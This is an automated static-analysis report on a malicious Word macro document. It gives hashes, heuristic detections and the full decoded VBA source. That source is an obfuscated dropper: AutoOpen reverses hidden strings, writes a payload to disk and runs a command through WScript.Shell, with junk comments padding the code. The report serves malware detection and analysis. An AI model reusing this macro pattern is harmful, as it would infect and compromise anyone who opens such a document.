Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 18581885166355d3…

MALICIOUS

Office (OOXML)

Size: 96.5 KB
Created: 2021-02-01 11:22:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-02-09
MD5: 8dfadc004e37fd42781577829adff990
SHA-1: a84a98acf643b799b6afc58cdfde884a48a005bb
SHA-256: 18581885166355d3a011144b5a5a7b47d4409095d1e288a97fcffc0c650cf055
Risk Score: 230

Heuristics (7)

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Dim aVBQ0O As New Shell32.Shell
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    avVfeb = CreateObject("wscript.shell").exec(awEi7Y)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set FSO = CreateObject("Scripting.FileSystemObject")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartex - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex - In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/ink - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3d - In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships - In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing - In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing - In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cex - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cid - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape - In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/ - In document text (OOXML body / shared strings)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# - In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/mm/ - In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# - In document text (OOXML body / shared strings)
    • http://purl.org/dc/elements/1.1/ - In document text (OOXML body / shared strings)
    • http://ns.adobe.com/photoshop/1.0/ - In document text (OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 6494 bytes
SHA-256: 583a64371cdf435f297f2e033cf683a71f777e291e5dd947658d5524959ecf41
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "frm"
Attribute VB_Base = "0{F4BD0919-8A93-413A-9BF3-D7518EE3DBFC}{ABC133F5-AC67-4D71-8DA1-43406297437C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "aubIKi"
Sub AutoOpen()
' Disjointed leave-taking sex brokers
' Intelligence friends unfaithful
' Tocsin tours substantially
' Sixty-two laptops infra baking suspended tenable
' Orlando fig consistent
' Enrich princess importune synthesis savage correlated baseball
' Dorado awareness
' Pasha ex- infraction careful bunch crosswise
Call aU2li8
End Sub
Function aqMXZ9(aUokPm)
' Equation andreas disprove wren notebook
' Situated namesake
For asi4M = Len(aUokPm) To 1 Step -1
axuzA = Mid(aUokPm, asi4M, 1)
any2A = any2A & axuzA
Next asi4M
aqMXZ9 = any2A
End Function
Sub aU2li8()
Call aMAU2k
End Sub
Sub aMAU2k()
Call ay8fB
End Sub
Sub ay8fB()
Call aIjs7
End Sub
Sub aIjs7()
Call a5sJR
End Sub
Sub a5sJR()
Call a7SUG
End Sub

Attribute VB_Name = "asfAc"

Attribute VB_Name = "aOku0K"
Sub a9gSt(aEGpS, aVQeOL)
' Incipient any waif employee orally season develops
' Richardson
Set FSO = CreateObject("Scripting.FileSystemObject")
FSO.CopyFile aEGpS, aVQeOL, 1
End Sub
Sub ahH7d(amfq7u, aZg4l)
' Variant
' Veterans vanguard without
' Roles schoolgirl year hobby breach
' Thirty-three
' Tawny biological coast alf distributors overnight
' Multimedia leslie bound
' Eau reports delusive sullied devil esperanto
' Reports kijiji necessarily tawdry
' Finder catacombs unaccompanied vicarious
' Instructions avant sky
' Payable portfolio
' Mom
' English sys debug
' Stress chef cranium deprecate
' Pease differentiate firemen urgency checkout
' Reset
' Concave buoyancy drier
' Translate icelandic horny
' Discounted brass xl rebecca
' Economy pas kindergarten lice referring
' Broomstick evasively liverpool wonderful
' Glen
' Kinase scorching partnerships blurred
' Sinewy embryo glinting jestingly
Open amfq7u For Output As #1
Print #1, aZg4l
' Indicated firstborn
' Monogram vaccine bride liabilities dissertation chary
Close #1
End Sub
Function acj8Um(amY5t)
' Morocco interlocutor gross
' Miserly undaunted bid airlines logo dean
' Examiner condo sedimentary enjoy
' Florists performs
' Perspectives births mask undignified launch fa
' Queenly abridgment number modulation
' Soot true central costume thimble devolve
End Function
Function aoKG6(aoKY0v)
' Epidemic deprecation rose impiety
' Chubby lenders replica
' Ahmed scorching spelt skirted anger
' Thoughts
' Credibility decorative filter
' Overhaul hopkins
' Unable
' Canyon
' Entitle outsider credits implementing amatory
' Impeach answers resume bread together mi suse
' Ds kenny yawned
' Caps senegal tariff
' Connecting colds
' Pers dam
' Vatican his expound mesh
' Drier
' Ranks insubordination prices
amfq7u = Split(aqMXZ9(frm.paths.text), "|")
If aoKY0v = 0 Then
aoKG6 = amfq7u(0)
ElseIf aoKY0v = 1 Then
aoKG6 = amfq7u(1)
ElseIf aoKY0v = 2 Then
aoKG6 = amfq7u(2)
ElseIf aoKY0v = 3 Then
aoKG6 = amfq7u(3)
End If
End Function
Function avVfeb(awEi7Y)
On Error Resume Next
avVfeb = CreateObject("wscript.shell").exec(awEi7Y)
End Function
Sub a7SUG()
a3sXb = aoKG6(0)
aVQeOL = aoKG6(1)
aEGpS = aoKG6(2)
aHpjhu = aoKG6(3)
' Fight garnered unyielding concepts
' Cute echoing manually
' First desktop
' Navajo
' Fees extension encompass bahamas stupor
' Legitimate justice lute
' Contentious pebble
' Developers closed loquacity
' Controversy mucous
' Lunar trousseau shooting
' Awesome
' Obadiah sealing require abeyance
' Carol
' Cafe lure globe
' Onlooker substantial mom
' Poisoning wish immediate stack
' Musical stretch forceful chef gauzy
' Fur ms ailment
' Style zigzag certificates
' Concentrate voluminous prow psychic
' Returned
' Easterly processes troubleshooting
' Worried presents activities subversive
' Leaven chassis gaming
' Accustom drought diploma
' Uniprotkb lassie issued annexation
' Invective claim vesta ax
' Odyssey screening modems
' Opened fetching cumbrous although
' Counseling tables seducer
aZg4l = aqMXZ9(frm.payload.text)
' Plume particles glacier swans
' Antipodes prodigal
ahH7d a3sXb, aZg4l
' Uninteresting sealed morocco
' Maniac stretcher diana
' Last wagner
' Ranger adverbs tyson origins dutchman
' Defendant
' Damper manufacture undergrowth
' Batman bradley
a9gSt aEGpS, aVQeOL
' Realm insulated
' Artery senior
' Ai eric
' Fullness
' Longer bb
' Inappropriate routing mortality prison solve
' Lender
' Agenda despotic
' Insulation scott pdt
' Saturnine helping world-wide christina caribbean
' Logos undefined
' Almoner monty madcap social crayon
' Names gloves
' Geek burgomaster z
' Pads
' Confluence vega
' Est accomplishing humanities
' Vanguard scholarships montgomery somalia denial
' Buffet thank
' Platforms regime hereby
' Bethany ostensibly windows
' Unwell leaving expansys
' Classification minuet satirical mail abased
Dim aVBQ0O As New Shell32.Shell
' Aspects sty complexity cowboy
' Boasting graceless vernon
' Whaler sam sewn debater shot salvage
' Jeer bengali eulogy instructors jo.
' Canned bromide economy artificer
Application.Run "avVfeb", aVQeOL & " " & aHpjhu & "mat : """ & a3sXb & """"
' Tatters waterfall tiller dukedom thus
' Neuralgia threat
' Packing disruption vaunted certainly
' Aggrieved crux apache
' Concentrate installing misgivings wr carolina
' Prep quota damps gun simulations
' Trading der
' Constraint loop relationships steppe
' Taxi garden argo intonation incidental
' Forever aging
' Pockets vocal
' Focused
' Quell stop hentai sporadic
' Antarctica
' Ibm powerseller portuguese
' Unscathed probation hellenic treasure
' Avg integration ian venerated ba general
' Propagating functioning paddy
' Obligatory macromedia clearing ichabod
' Assistance bk council waning
' Mixed astral eulogium
' Motherhood pos permanent
' Bathroom prescience subsidiaries
' Kerry game amount alexander
End Sub
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 36352 bytes
SHA-256: 01af2af20dd00245a9f04700bccbc910c32e89f348ac986b44cf0c58e9306c38